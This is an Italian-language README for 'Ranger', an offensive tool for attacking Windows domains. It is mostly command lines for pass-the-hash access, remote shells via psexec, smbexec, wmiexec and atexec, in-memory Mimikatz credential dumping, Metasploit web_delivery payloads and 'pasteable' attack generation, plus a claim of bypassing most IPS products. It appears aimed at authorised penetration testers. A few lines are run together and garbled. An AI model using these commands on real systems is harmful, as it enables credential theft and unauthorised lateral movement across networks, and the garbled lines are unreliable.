
Uno strumento per professionisti della sicurezza per accedere e interagire con sistemi remoti basati su Microsoft Windows.
Uno strumento per supportare i professionisti della sicurezza nell'accesso e nell'interazione con sistemi Microsoft Windows remoti.
Questo progetto è stato concepito con il pensiero che non abbiamo inventato l'arco o la freccia, solo un modo più efficiente di usarli.
Ranger è uno strumento di attacco e penetration testing a riga di comando, in grado di utilizzare un server catapulta istanziato per fornire capacità contro sistemi Windows. Finché un utente ha un insieme di credenziali o un insieme di hash (NTLM, LM, LM:NTLM) può ottenere l'accesso ai sistemi che fanno parte del trust.
Utilizzando questa capacità, un professionista della sicurezza può estrarre credenziali dalla memoria in chiaro,
accedere alle tabelle SAM, eseguire comandi, script PowerShell, binari Windows e altri strumenti.
Al momento, lo strumento bypassa la maggior parte delle soluzioni IPS dei vendor, a meno che non siano state
appositamente configurate per rilevarlo. Lo strumento è stato sviluppato utilizzando i nostri home lab per supportare
i professionisti della sicurezza in attività legalmente e/o contrattualmente autorizzate.
Altre funzionalità verranno aggiunte, ma al momento lo strumento utilizza i contributi della community da repository relativi ai team di PowerShell PowerView, PowerShell Mimikatz e Impacket.
wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh
ranger --update
--scout
--secrets-dump
--wmiexec
--psexec
--smbexec
--atexec
--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access
##Esecuzione dei Comandi: ###Trova Utenti Collegati:
ranger.py [-u Administrator] [-p Password1] [-d Domain] --scout
###Shell Comandi SMBEXEC:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --smbexec -q -v -vv -vvv
###Shell Comandi PSEXEC:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -q -v -vv -vvv
###Esecuzione Comandi PSEXEC:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -c "Net User" -q -v -vv -vvv
###Esecuzione Comandi WMIEXEC:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec -c "Net User"
###Iniettore Memoria PowerShell Mimikatz WMIEXEC:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker
###Iniettore Memoria Metasploit web_delivery WMIEXEC (richiede configurazione Metasploit, vedi sotto):
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader
###Iniettore Memoria Codice Personalizzato WMIEXEC:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds"
###Esecuzione Comandi ATEXEC:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec -c "Net User" --no-encoder
###Iniettore Memoria PowerShell Mimikatz ATEXEC:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker --no-encoder
###Iniettore Memoria Metasploit web_delivery ATEXEC (richiede configurazione Metasploit, vedi sotto):
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader --no-encoder
###Iniettore Memoria Codice Personalizzato ATEXEC:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds" --no-encoder
###Iniettore Memoria Codice Personalizzato SECRETSDUMP:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --secrets-dump
###Crea Attacco Mimikatz Incollabile:
ranger.py --invoker -q -v -vv -vvv
###Crea Attacco web_delivery Incollabile (richiede configurazione Metasploit, vedi sotto):
ranger.py --downloader -q -v -vv -vvv
###Crea Attacco Executor Incollabile:
ranger.py --executor -q -v -vv -vvv
--get-domain-membership--domain, che consente di puntare a un dominio diverso da quello in cui si è effettuato l'accessoranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --get-domain-membership
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --domain "Domain.local2"
##Note sull'Utilizzo: ###Formato File Credenziali:
username password
username LM:NTLM
username :NTLM
username **NO PASSWORD**:NTLM
PWDUMP
username PWDUMP domain
username password domain
username LM:NTLM domain
username :NTLM domain
username **NO PASSWORD**:NTLM domain
PWDUMP domain
username PWDUMP domain
###Avvertenze sul File Credenziali:
-d, si presuppone che si desideri ignorare tutti i nomi di dominio nel file.###Esecuzione da Riga di Comando:
password
LM:NTLM
:NTLM
PWDUMP
###Target ed Esclusioni:
####Target, Intervalli di Target, CIDR di Target, Elenchi di Target, Target da XML NMAP:
-t 192.168.195.1-100,192.168.195.200-192.168.198.3 -tl list1,list2,lis3 -tnX scan1.xml,scan2.xml####Esclusioni, Intervalli di Esclusione, CIDR di Esclusione, Elenchi di Esclusione, Esclusioni da XML Nmap:
t nei comandi con e-e 192.168.195.1-100,192.168.195.200-192.168.198.3 -el list1,list2,lis3 -enX scan1.xml,scan2.xml